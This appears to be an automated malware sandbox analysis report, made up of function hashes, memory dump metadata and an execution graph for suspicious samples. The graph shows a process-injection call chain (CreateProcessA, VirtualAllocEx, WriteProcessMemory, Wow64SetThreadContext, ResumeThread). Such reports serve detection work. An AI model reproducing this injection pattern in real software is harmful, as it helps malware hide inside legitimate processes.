                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_11_2_2ac0000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: Xbq$Xbq
                                                                                                                                                                      • API String ID: 0-1243427068
                                                                                                                                                                      • Opcode ID: fea9aee6c908da8c39df1d4d6c2674f68863141cebf00d3f632762a78e222999
                                                                                                                                                                      • Instruction ID: d20da5b1c636322424ae82509af43ff8ebe067889506ebe977fe2aec09b81946
                                                                                                                                                                      • Opcode Fuzzy Hash: fea9aee6c908da8c39df1d4d6c2674f68863141cebf00d3f632762a78e222999
                                                                                                                                                                      • Instruction Fuzzy Hash: AE310535B443248BDF194B7999D437EAAB6ABC4314F2888BDE802C7390DF75CC4A8791
                                                                                                                                                                      Function 02AC0C8F Relevance: 1.8, Strings: 1, Instructions: 545COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000B.00000002.1989657496.0000000002AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_11_2_2ac0000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: LR^q
                                                                                                                                                                      • API String ID: 0-2625958711
                                                                                                                                                                      • Opcode ID: 69fd8a4885c1afc9e6db9f9d92d3c3bd8c81cab00b4074ee50ca5c783a6ddddb
                                                                                                                                                                      • Instruction ID: 897699842329d665c4ea865ebffcb76ec72949a323f9f1f78e7b21e0b0e05f84
                                                                                                                                                                      • Opcode Fuzzy Hash: 69fd8a4885c1afc9e6db9f9d92d3c3bd8c81cab00b4074ee50ca5c783a6ddddb
                                                                                                                                                                      • Instruction Fuzzy Hash: 7C52BD78D40219CFCB54EF64EA98A9DBBF2FB58309F1049A5D409AB758DB305E85CF80
                                                                                                                                                                      Function 02AC0CA0 Relevance: 1.8, Strings: 1, Instructions: 539COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000B.00000002.1989657496.0000000002AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_11_2_2ac0000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: LR^q
                                                                                                                                                                      • API String ID: 0-2625958711
                                                                                                                                                                      • Opcode ID: 2673f37b79fda5e77d6d75382721a18c49b066e0f92d1c19e737fd707d4e72a4
                                                                                                                                                                      • Instruction ID: 3e73e4a56ac8ddf59a530f5ef7fafe60cc9df50c0b87726cb94bafdfb75bb17c
                                                                                                                                                                      • Opcode Fuzzy Hash: 2673f37b79fda5e77d6d75382721a18c49b066e0f92d1c19e737fd707d4e72a4
                                                                                                                                                                      • Instruction Fuzzy Hash: FB529D78D40219CFCB54EF64EA98A9DBBF2FB58309F1049A5D409AB758DB305E85CF40
                                                                                                                                                                      Function 02AC28F0 Relevance: .1, Instructions: 77COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000B.00000002.1989657496.0000000002AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_11_2_2ac0000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 5a507a14e5efe7b254dd905a9fa4f0468f202f51622e37f81e8d3277f4f4575e
                                                                                                                                                                      • Instruction ID: 56b779f3c1be38d5f50395fac9021723b25abbcda32b44fb4683c4ea9839624a
                                                                                                                                                                      • Opcode Fuzzy Hash: 5a507a14e5efe7b254dd905a9fa4f0468f202f51622e37f81e8d3277f4f4575e
                                                                                                                                                                      • Instruction Fuzzy Hash: 7E219D75A002059FCB28DF24C480AAE77A5EB9D668B20C41DD84A9B240DF34EA47CBD2
                                                                                                                                                                      Function 02AC4285 Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000B.00000002.1989657496.0000000002AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_11_2_2ac0000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 9da0d727b7b7611ea7b3879a589248ecb87913b9a811a314014dbd02a36eff7d
                                                                                                                                                                      • Instruction ID: e5c733ae7590a96ab19bc5b32f220103d91488ae1e415a30933975d5355eeee1
                                                                                                                                                                      • Opcode Fuzzy Hash: 9da0d727b7b7611ea7b3879a589248ecb87913b9a811a314014dbd02a36eff7d
                                                                                                                                                                      • Instruction Fuzzy Hash: 0D31A674E11309CFCB44DFA8E59889DBBB2FF49309B204469E919AB364DB31AD46CF40
                                                                                                                                                                      Function 02AC27F0 Relevance: .1, Instructions: 59COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000B.00000002.1989657496.0000000002AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_11_2_2ac0000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: f6eb438499a4fc838bedf72365075222f7d0c0ccaa6d0ad105b6ef41101ee024
                                                                                                                                                                      • Instruction ID: b64dd4d2d2f577ab14e626b9793131bd50590232d9450dedfcedfe61e94284b7
                                                                                                                                                                      • Opcode Fuzzy Hash: f6eb438499a4fc838bedf72365075222f7d0c0ccaa6d0ad105b6ef41101ee024
                                                                                                                                                                      • Instruction Fuzzy Hash: C021CE74D0520ACFCB01EFA9D9856EEBBF4FF19304F10556AD819B7210EB305A96CBA1
                                                                                                                                                                      Function 02AC28A2 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000B.00000002.1989657496.0000000002AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_11_2_2ac0000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 78c6a49b14e6fedadfc8c225d25d8925cf6359cec1eec0fcfae7efb05bc98f34
                                                                                                                                                                      • Instruction ID: a48e284d81f646366801e14ff7c7b221b3604c1b7a92e8cc141683a10d7047c8
                                                                                                                                                                      • Opcode Fuzzy Hash: 78c6a49b14e6fedadfc8c225d25d8925cf6359cec1eec0fcfae7efb05bc98f34
                                                                                                                                                                      • Instruction Fuzzy Hash: C5E02636D2032A8BCB02EBB0EC410EEB734ADD1221B15855BC0A532081EB30224BC7A2
                                                                                                                                                                      Function 02AC28B0 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000B.00000002.1989657496.0000000002AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_11_2_2ac0000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: b503962c535854a3d0c26ce597b0c90f39579257fe22cec449bdb92c4e67e7ee
                                                                                                                                                                      • Instruction ID: 38500f3bade9f6392afe9a83f925e0f025d31839c3fe1b8d4446b912d8b1d3f2
                                                                                                                                                                      • Opcode Fuzzy Hash: b503962c535854a3d0c26ce597b0c90f39579257fe22cec449bdb92c4e67e7ee
                                                                                                                                                                      • Instruction Fuzzy Hash: 72D01231D2022A578B00AAA5DC044EEB738EE95665B504626D55437140EB70665986A2

                                                                                                                                                                      Execution Graph

                                                                                                                                                                      Execution Coverage:9.8%
                                                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                                      Total number of Nodes:179
                                                                                                                                                                      Total number of Limit Nodes:6
                                                                                                                                                                      execution_graph 38054 9cb318 38057 9cb401 38054->38057 38055 9cb327 38058 9cb421 38057->38058 38059 9cb444 38057->38059 38058->38059 38060 9cb648 GetModuleHandleW 38058->38060 38059->38055 38061 9cb675 38060->38061 38061->38055 38237 509a3ed 38238 509a3fd 38237->38238 38240 509d181 ResumeThread 38238->38240 38241 509d190 ResumeThread 38238->38241 38239 509a990 38240->38239 38241->38239 38253 9cd8e8 DuplicateHandle 38254 9cd97e 38253->38254 38255 9c4c68 38256 9c4c82 38255->38256 38257 9c4c93 38256->38257 38259 9c4dc1 38256->38259 38260 9c4de5 38259->38260 38264 9c4ed0 38260->38264 38268 9c4ec1 38260->38268 38265 9c4ef7 38264->38265 38266 9c4fd4 38265->38266 38272 9c4a18 38265->38272 38269 9c4ed0 38268->38269 38270 9c4fd4 38269->38270 38271 9c4a18 CreateActCtxA 38269->38271 38271->38270 38273 9c5f60 CreateActCtxA 38272->38273 38275 9c6023 38273->38275 38062 509a64f 38063 509a65f 38062->38063 38067 509d181 38063->38067 38071 509d190 38063->38071 38064 509a686 38068 509d1c3 38067->38068 38069 509d231 38068->38069 38075 509d578 38068->38075 38069->38064 38072 509d1c3 38071->38072 38073 509d231 38072->38073 38074 509d578 ResumeThread 38072->38074 38073->38064 38074->38073 38076 509d55a 38075->38076 38077 509d57f ResumeThread 38075->38077 38076->38069 38079 509d5f1 38077->38079 38079->38069 38080 509e4d1 38082 509e261 38080->38082 38081 509e270 38082->38081 38085 509fc08 38082->38085 38090 509fbf8 38082->38090 38086 509fc1d 38085->38086 38095 509fc38 38086->38095 38111 509fc48 38086->38111 38087 509fc2f 38087->38082 38091 509fc1d 38090->38091 38093 509fc38 12 API calls 38091->38093 38094 509fc48 12 API calls 38091->38094 38092 509fc2f 38092->38082 38093->38092 38094->38092 38096 509fc62 38095->38096 38097 509fc86 38096->38097 38127 e2604c4 38096->38127 38131 e2603b9 38096->38131 38139 e2602ba 38096->38139 38144 e26083f 38096->38144 38148 e2607bf 38096->38148 38152 e260413 38096->38152 38156 e2601d5 38096->38156 38160 e2606d7 38096->38160 38164 e260508 38096->38164 38169 e26034c 38096->38169 38177 e260480 38096->38177 38182 e2604a2 38096->38182 38187 e260385 38096->38187 38097->38087 38112 509fc62 38111->38112 38113 509fc86 38112->38113 38114 e2604c4 2 API calls 38112->38114 38115 e260385 2 API calls 38112->38115 38116 e2604a2 2 API calls 38112->38116 38117 e260480 2 API calls 38112->38117 38118 e26034c 4 API calls 38112->38118 38119 e260508 2 API calls 38112->38119 38120 e2606d7 2 API calls 38112->38120 38121 e2601d5 2 API calls 38112->38121 38122 e260413 2 API calls 38112->38122 38123 e2607bf 2 API calls 38112->38123 38124 e26083f 2 API calls 38112->38124 38125 e2602ba 2 API calls 38112->38125 38126 e2603b9 4 API calls 38112->38126 38113->38087 38114->38113 38115->38113 38116->38113 38117->38113 38118->38113 38119->38113 38120->38113 38121->38113 38122->38113 38123->38113 38124->38113 38125->38113 38126->38113 38192 509d629 38127->38192 38196 509d630 38127->38196 38128 e2604b5 38132 e260361 38131->38132 38134 e2603c2 38131->38134 38135 509d629 Wow64SetThreadContext 38132->38135 38136 509d630 Wow64SetThreadContext 38132->38136 38133 e260366 38133->38134 38137 509d578 ResumeThread 38133->38137 38200 509d580 38133->38200 38134->38097 38134->38134 38135->38133 38136->38133 38137->38134 38140 e26062a 38139->38140 38204 509d7c8 38140->38204 38208 509d7c0 38140->38208 38141 e26064e 38146 509d7c8 WriteProcessMemory 38144->38146 38147 509d7c0 WriteProcessMemory 38144->38147 38145 e26086d 38146->38145 38147->38145 38212 509d708 38148->38212 38216 509d700 38148->38216 38149 e2607ec 38221 509dcb8 38152->38221 38225 509dcb0 38152->38225 38153 e260234 38153->38097 38229 509de50 38156->38229 38233 509de47 38156->38233 38162 509d578 ResumeThread 38160->38162 38163 509d580 ResumeThread 38160->38163 38161 e26070e 38162->38161 38163->38161 38165 e260529 38164->38165 38166 e26070e 38165->38166 38167 509d578 ResumeThread 38165->38167 38168 509d580 ResumeThread 38165->38168 38167->38166 38168->38166 38170 e260361 38169->38170 38173 509d629 Wow64SetThreadContext 38170->38173 38174 509d630 Wow64SetThreadContext 38170->38174 38171 e260366 38172 e26070e 38171->38172 38175 509d578 ResumeThread 38171->38175 38176 509d580 ResumeThread 38171->38176 38172->38097 38173->38171 38174->38171 38175->38172 38176->38172 38178 e26049c 38177->38178 38179 e26070e 38178->38179 38180 509d578 ResumeThread 38178->38180 38181 509d580 ResumeThread 38178->38181 38179->38179 38180->38179 38181->38179 38183 e2604af 38182->38183 38185 509d7c8 WriteProcessMemory 38183->38185 38186 509d7c0 WriteProcessMemory 38183->38186 38184 e260a61 38185->38184 38186->38184 38188 e260397 38187->38188 38189 e2607ec 38188->38189 38190 509d708 VirtualAllocEx 38188->38190 38191 509d700 VirtualAllocEx 38188->38191 38190->38189 38191->38189 38193 509d675 Wow64SetThreadContext 38192->38193 38195 509d6bd 38193->38195 38195->38128 38197 509d675 Wow64SetThreadContext 38196->38197 38199 509d6bd 38197->38199 38199->38128 38201 509d5c0 ResumeThread 38200->38201 38203 509d5f1 38201->38203 38203->38134 38205 509d810 WriteProcessMemory 38204->38205 38207 509d867 38205->38207 38207->38141 38209 509d810 WriteProcessMemory 38208->38209 38211 509d867 38209->38211 38211->38141 38213 509d748 VirtualAllocEx 38212->38213 38215 509d785 38213->38215 38215->38149 38217 509d705 38216->38217 38218 509d6e2 38217->38218 38219 509d752 VirtualAllocEx 38217->38219 38218->38149 38220 509d785 38219->38220 38220->38149 38222 509dd03 ReadProcessMemory 38221->38222 38224 509dd47 38222->38224 38224->38153 38226 509dc92 38225->38226 38226->38225 38227 509dd16 ReadProcessMemory 38226->38227 38228 509dd47 38227->38228 38228->38153 38230 509ded9 CreateProcessA 38229->38230 38232 509e09b 38230->38232 38232->38232 38234 509ded9 CreateProcessA 38233->38234 38236 509e09b 38234->38236 38236->38236 38276 9cd6a0 38277 9cd6e6 GetCurrentProcess 38276->38277 38279 9cd738 GetCurrentThread 38277->38279 38280 9cd731 38277->38280 38281 9cd76e 38279->38281 38282 9cd775 GetCurrentProcess 38279->38282 38280->38279 38281->38282 38283 9cd7ab GetCurrentThreadId 38282->38283 38285 9cd804 38283->38285 38242 e260e88 38243 e260e69 38242->38243 38244 e260e8f 38242->38244 38244->38243 38247 e261110 38244->38247 38251 e261118 PostMessageW 38244->38251 38248 e261117 PostMessageW 38247->38248 38249 e2610f2 38247->38249 38250 e261184 38248->38250 38249->38247 38250->38244 38252 e261184 38251->38252 38252->38244

                                                                                                                                                                      Executed Functions

                                                                                                                                                                      Function 04A904B8 Relevance: 12.7, Strings: 10, Instructions: 211COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 294 4a904b8-4a904b9 295 4a904bb-4a90775 294->295 296 4a90463-4a9049c 294->296 341 4a9049e call 4a91d90 296->341 342 4a9049e call 4a91d82 296->342 305 4a904a3-4a904a5 343 4a904aa call 4a92cf0 305->343 344 4a904aa call 4a92d00 305->344 345 4a904aa call 4a92d86 305->345 308 4a904af-4a904b6 341->305 342->305 343->308 344->308 345->308
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
                                                                                                                                                                      • API String ID: 0-518715366
                                                                                                                                                                      • Opcode ID: b755b82bf5513e1ef64a9d0d2b4630f3ced2b9b766c232aba783092219682020
                                                                                                                                                                      • Instruction ID: f5266b9939cee6a249bd52c9eda2b96ac203f5b4389d7ef578c5b454e7418955
                                                                                                                                                                      • Opcode Fuzzy Hash: b755b82bf5513e1ef64a9d0d2b4630f3ced2b9b766c232aba783092219682020
                                                                                                                                                                      • Instruction Fuzzy Hash: 74912D31E4064A9FCB08EFA9D8546DDF7B2FF85304F518A29D005AF356DB70698ACB81
                                                                                                                                                                      Function 009CD6A0 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 346 9cd6a0-9cd72f GetCurrentProcess 350 9cd738-9cd76c GetCurrentThread 346->350 351 9cd731-9cd737 346->351 352 9cd76e-9cd774 350->352 353 9cd775-9cd7a9 GetCurrentProcess 350->353 351->350 352->353 355 9cd7ab-9cd7b1 353->355 356 9cd7b2-9cd7ca 353->356 355->356 359 9cd7d3-9cd802 GetCurrentThreadId 356->359 360 9cd80b-9cd86d 359->360 361 9cd804-9cd80a 359->361 361->360
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 009CD71E
                                                                                                                                                                      • GetCurrentThread.KERNEL32 ref: 009CD75B
                                                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 009CD798
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 009CD7F1
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1766573670.00000000009C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009C0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_9c0000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Current$ProcessThread
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2063062207-0
                                                                                                                                                                      • Opcode ID: 4359f04f55b7cd24242cd94aac1f99dc13694ea9b3248d9225d06224d2dc18e8
                                                                                                                                                                      • Instruction ID: 0893b80998eec2b0eef71ded65329b450f08d70ba0151f6eb1a2ee91511f181b
                                                                                                                                                                      • Opcode Fuzzy Hash: 4359f04f55b7cd24242cd94aac1f99dc13694ea9b3248d9225d06224d2dc18e8
                                                                                                                                                                      • Instruction Fuzzy Hash: 455134B0D01349DFDB14DFAAD548B9EBBF1EF48314F208469E019A7260DB74A984CF66
                                                                                                                                                                      Function 04A93499 Relevance: 3.9, Strings: 3, Instructions: 191COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 367 4a93499-4a934a0 368 4a93439-4a93493 367->368 369 4a934a2-4a93591 367->369 374 4a9359d-4a935a9 369->374 392 4a935ac call 4a94141 374->392 393 4a935ac call 4a94150 374->393 375 4a935b2-4a935cb 379 4a9362d-4a936a0 call 4a91cbc 375->379 380 4a935cd-4a93625 375->380 382 4a936a5-4a936e2 379->382 380->379 388 4a936ed-4a936fd 382->388 389 4a93703-4a93713 call 4a91ccc 388->389 392->375 393->375
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: $ $X t
                                                                                                                                                                      • API String ID: 0-2151569440
                                                                                                                                                                      • Opcode ID: 4daa1309ba087fb50c76cca01ea99033ce6eb06a29500015bc995ec07a1d936b
                                                                                                                                                                      • Instruction ID: efdfc54a113999e13a544d5c3e17a78045307d2cc46d205751fb5767a636e02a
                                                                                                                                                                      • Opcode Fuzzy Hash: 4daa1309ba087fb50c76cca01ea99033ce6eb06a29500015bc995ec07a1d936b
                                                                                                                                                                      • Instruction Fuzzy Hash: 4B81AF31D10701CFDB45EF29D884659B7F1FF86314B028AA9D949AF216EB71A998CF80
                                                                                                                                                                      Function 04A91C8C Relevance: 3.9, Strings: 3, Instructions: 162COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 394 4a91c8c-4a935a9 418 4a935ac call 4a94141 394->418 419 4a935ac call 4a94150 394->419 401 4a935b2-4a935cb 405 4a9362d-4a93713 call 4a91cbc call 4a91ccc 401->405 406 4a935cd-4a93625 401->406 406->405 418->401 419->401
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: $ $X t
                                                                                                                                                                      • API String ID: 0-2151569440
                                                                                                                                                                      • Opcode ID: 7eb1778116046d3ee6ba2222ec99f071d6379084cc405e3b48a6b27f8b89bd55
                                                                                                                                                                      • Instruction ID: b7f5e3bcaf6301673ea7597c0db36d21649c398857d87d222f400eb8141edaf3
                                                                                                                                                                      • Opcode Fuzzy Hash: 7eb1778116046d3ee6ba2222ec99f071d6379084cc405e3b48a6b27f8b89bd55
                                                                                                                                                                      • Instruction Fuzzy Hash: DB71A130920701CFDB45EF29D885A59B7F5FF86304B418AA8D949AF316EB71E994CF80
                                                                                                                                                                      Function 04A97ED8 Relevance: 2.7, Strings: 2, Instructions: 213COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 442 4a97ed8-4a97f3a call 4a9729c 448 4a97f3c-4a97f3e 442->448 449 4a97fa0-4a97fcc 442->449 450 4a97fd3-4a97fdb 448->450 451 4a97f44-4a97f50 448->451 449->450 456 4a97fe2-4a9811d 450->456 451->456 457 4a97f56-4a97f91 call 4a972a8 451->457 474 4a98123-4a98131 456->474 467 4a97f96-4a97f9f 457->467 475 4a9813a-4a98167 474->475 476 4a98133-4a98139 474->476 480 4a98168 475->480 476->475 481 4a980eb-4a9811d 480->481 482 4a9816a-4a98180 480->482 481->474 484 4a9818d-4a981cd 482->484 485 4a98182-4a98185 482->485 484->480 487 4a981cf-4a98208 484->487 485->484 492 4a98208 call 4a98228 487->492 493 4a98208 call 4a98218 487->493 491 4a9820e-4a98211 492->491 493->491
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: Hbq$Hbq
                                                                                                                                                                      • API String ID: 0-4258043069
                                                                                                                                                                      • Opcode ID: e9bc58e476d8ee74faec937bcbb8a094833b9a52bd5b20279fbc598cf7a01437
                                                                                                                                                                      • Instruction ID: 690acf3e31cf18da39e879506aac835c6c9771ed80de789aa72894191f12491c
                                                                                                                                                                      • Opcode Fuzzy Hash: e9bc58e476d8ee74faec937bcbb8a094833b9a52bd5b20279fbc598cf7a01437
                                                                                                                                                                      • Instruction Fuzzy Hash: 76815C70E102589FDF14DFA9C4946AEBBF6FF89300F24852AE409AB351DB349D46CB91
                                                                                                                                                                      Function 04A9C4CC Relevance: 2.7, Strings: 2, Instructions: 206COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: (bq$Hbq
                                                                                                                                                                      • API String ID: 0-4081012451
                                                                                                                                                                      • Opcode ID: fb2c5058752593cbbe3c27f92eacb3231d4024cd31fa77cf6f84c9f22fe7e578
                                                                                                                                                                      • Instruction ID: 417ad87a7e53f3f531f6138a259b5878ce2453e02513a3120c57d3b530046399
                                                                                                                                                                      • Opcode Fuzzy Hash: fb2c5058752593cbbe3c27f92eacb3231d4024cd31fa77cf6f84c9f22fe7e578
                                                                                                                                                                      • Instruction Fuzzy Hash: 1271AE31A006158FDB04EF7DC49056AB7E6FFC93147118969E40AAB366EF30ED45CB81
                                                                                                                                                                      Function 04A98228 Relevance: 2.6, Strings: 2, Instructions: 80COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 629 4a98228-4a98260 call 4a97a84 633 4a98265-4a98267 629->633 634 4a98269-4a982a8 633->634 635 4a982e0-4a98318 633->635 643 4a982d9-4a982df 634->643 644 4a982aa-4a982d3 634->644 644->643
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: X t$goX
                                                                                                                                                                      • API String ID: 0-1672835317
                                                                                                                                                                      • Opcode ID: 4db87896d9051a01971994d2d1833973e1d717cb0d83e2616335d3c47a0e1dab
                                                                                                                                                                      • Instruction ID: 4110e5296d18dd16ec996a17a23d743ef8cf594cbe326b655a8746e14d91e5ac
                                                                                                                                                                      • Opcode Fuzzy Hash: 4db87896d9051a01971994d2d1833973e1d717cb0d83e2616335d3c47a0e1dab
                                                                                                                                                                      • Instruction Fuzzy Hash: 04212671A002008FCB05EF39C44859FBBE6EF82304B1588ADD506DB361EB30EC0A8B91
                                                                                                                                                                      Function 04A98218 Relevance: 2.6, Strings: 2, Instructions: 66COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 647 4a98218-4a98260 call 4a97a84 651 4a98265-4a98267 647->651 652 4a98269-4a982a8 651->652 653 4a982e0-4a98318 651->653 661 4a982d9-4a982df 652->661 662 4a982aa-4a982d3 652->662 662->661
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: X t$goX
                                                                                                                                                                      • API String ID: 0-1672835317
                                                                                                                                                                      • Opcode ID: f830fa06ad866bc0c3356bea22eb51d4db9b999e60c63a31c83a10d42f213a10
                                                                                                                                                                      • Instruction ID: 5d0439e00c8700b4bc5bf758bcb0f54e9d70451cf8556ac49ec94d0487201c1e
                                                                                                                                                                      • Opcode Fuzzy Hash: f830fa06ad866bc0c3356bea22eb51d4db9b999e60c63a31c83a10d42f213a10
                                                                                                                                                                      • Instruction Fuzzy Hash: 2C212775A102008FCB00EF69C40889FBBF1EF81314B0088A9E546DB361EF30ED0A8B92
